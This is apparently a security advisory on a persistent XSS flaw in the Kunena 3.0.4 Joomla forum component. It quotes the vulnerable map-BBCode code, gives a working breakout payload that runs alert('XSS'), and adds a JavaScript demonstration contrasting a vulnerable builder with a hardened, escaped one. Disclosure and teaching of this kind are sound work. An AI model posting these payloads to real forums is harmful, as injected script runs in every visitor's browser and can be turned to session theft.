Joomla Kunena Component 3.0.4 - Persistent XSS

路人甲    2014-04-01 06:49:56

Vulnerability description

Persistent XSS in Joomla::Kunena 3.0.4
26. February 2014
by Qoppa
 
+++ Description
 
"Kunena is the leading Joomla forum component. Downloaded more than 3,750,000 times in nearly 6 years."
 
Kunena is written in PHP. Users can embed a Google Map in a post with the following BBCode:
    [map]content[/map]
 
Kunena generates an inline JavaScript declaration from this input, but does not escape it correctly for the JavaScript string context into which it is placed.
 
 
+++ Analysis
 
Vulnerable function in \bbcode\bbcode.php (lines 1049-1116)
 
1049    function DoMap($bbcode, $action, $name, $default, $params, $content) {
    ...
1078    $document->addScriptDeclaration("
1079    // <![CDATA[
    ...
1097    var contentString = '<p><strong>".JText::_('COM_KUNENA_GOOGLE_MAP_NO_GEOCODE', true)." <i>".json_encode($content)."</i></strong></p>';
    ...
1112    // ]]>"
1113    );
 
json_encode() escapes double quotes and backslashes but leaves single quotes untouched (unless JSON_HEX_APOS is passed), and its output is concatenated into a single-quoted JavaScript string literal. A single quote in $content therefore terminates the literal, and whatever follows is parsed as JavaScript: the attacker breaks out of the encapsulation and the script runs in the browser of every user who views the post.

Test code

Posting the following inside a [map] tag closes the string literal and the enclosing callback blocks, runs alert('XSS'), and then reopens matching blocks and a string so that the rest of the generated script still parses:

[map]'}});}});alert('XSS');(function(){{(function(){{var v='[/map]
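To make the breakout concrete, the following is an added example; it is not code from the advisory or from Kunena. It reproduces the pattern of line 1097 in JavaScript (JSON.stringify, like PHP's json_encode() without flags, escapes double quotes and backslashes but not single quotes) inside a simplified, flat stand-in for the template, executes the generated script with a capturing alert(), and contrasts it with a hardened builder that HTML-escapes the content and then emits the JSON literal as a bare expression with <, >, & and ' hex-escaped, roughly the equivalent of json_encode($html, JSON_HEX_TAG|JSON_HEX_AMP|JSON_HEX_APOS|JSON_HEX_QUOT). The template text, the "No geocode" placeholder, the simple payload and the runGenerated() harness are assumptions of this example; the advisory's own payload is tailored to the nesting of Kunena's real template (the two '}});' close two real callback blocks) and so only produces a SyntaxError against this flat stand-in.

```javascript
// Added example (not Kunena code): simplified stand-in for the vulnerable
// addScriptDeclaration template at bbcode.php line 1097, plus a hardened
// builder, executed to show whether attacker text runs as script.
const PLACEHOLDER = 'No geocode'; // stands in for COM_KUNENA_GOOGLE_MAP_NO_GEOCODE

// Vulnerable: JSON.stringify (like PHP json_encode() with no flags) escapes
// " and \ but leaves ' alone, and the result is spliced into a '...' literal.
function buildVulnerableScript(content) {
  return "var contentString = '<p><strong>" + PLACEHOLDER + " <i>" +
    JSON.stringify(content) + "</i></strong></p>';";
}

// HTML-escape for text that will end up in innerHTML (the map info window).
function htmlEscape(s) {
  return s.replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' })[c]);
}

// JSON string literal with <, >, &, ' and the JS line terminators hex-escaped,
// roughly json_encode($s, JSON_HEX_TAG|JSON_HEX_AMP|JSON_HEX_APOS|JSON_HEX_QUOT)
// plus U+2028/U+2029; safe as a bare expression inside an inline <script>.
function jsStringLiteral(s) {
  return JSON.stringify(s).replace(/[<>&'\u2028\u2029]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Hardened: build the HTML first, then emit it as one properly encoded JS
// string literal; no hand-written quotes around untrusted data.
function buildSafeScript(content) {
  const html = '<p><strong>' + PLACEHOLDER + ' <i>' + htmlEscape(content) + '</i></strong></p>';
  return 'var contentString = ' + jsStringLiteral(html) + ';';
}

// Run a generated script the way the browser would, with alert() captured.
// Returns the alert arguments, the resulting contentString, and the error
// name if the script did not even parse.
function runGenerated(script) {
  const alerts = [];
  try {
    const fn = new Function('alert', script + '\nreturn contentString;');
    const contentString = fn((msg) => alerts.push(String(msg)));
    return { alerts, contentString, error: null };
  } catch (e) {
    return { alerts, contentString: null, error: e.name };
  }
}

// Constructed inputs: a benign address, a payload written for this flat
// stand-in, and the advisory's payload, which closes two callback blocks of
// Kunena's real template ('}});}});') and so does not parse against this one.
const BENIGN = 'Berlin, Germany';
const SIMPLE_PAYLOAD = "'; alert('XSS'); var v='";
const ADVISORY_PAYLOAD = "'}});}});alert('XSS');(function(){{(function(){{var v='";

function demo() {
  return {
    benign: runGenerated(buildVulnerableScript(BENIGN)),
    vulnerable: runGenerated(buildVulnerableScript(SIMPLE_PAYLOAD)),
    hardened: runGenerated(buildSafeScript(SIMPLE_PAYLOAD)),
    advisoryOnStandIn: runGenerated(buildVulnerableScript(ADVISORY_PAYLOAD)),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

With the simple payload the vulnerable builder yields a script in which alert('XSS') executes and contentString is truncated at the injected quote; the hardened builder yields a script that parses, calls nothing, and assigns the escaped HTML unchanged. The hardened output also contains no literal '<', so a "</script>" in the content cannot terminate the inline script block, which is the case JSON_HEX_TAG covers on the PHP side.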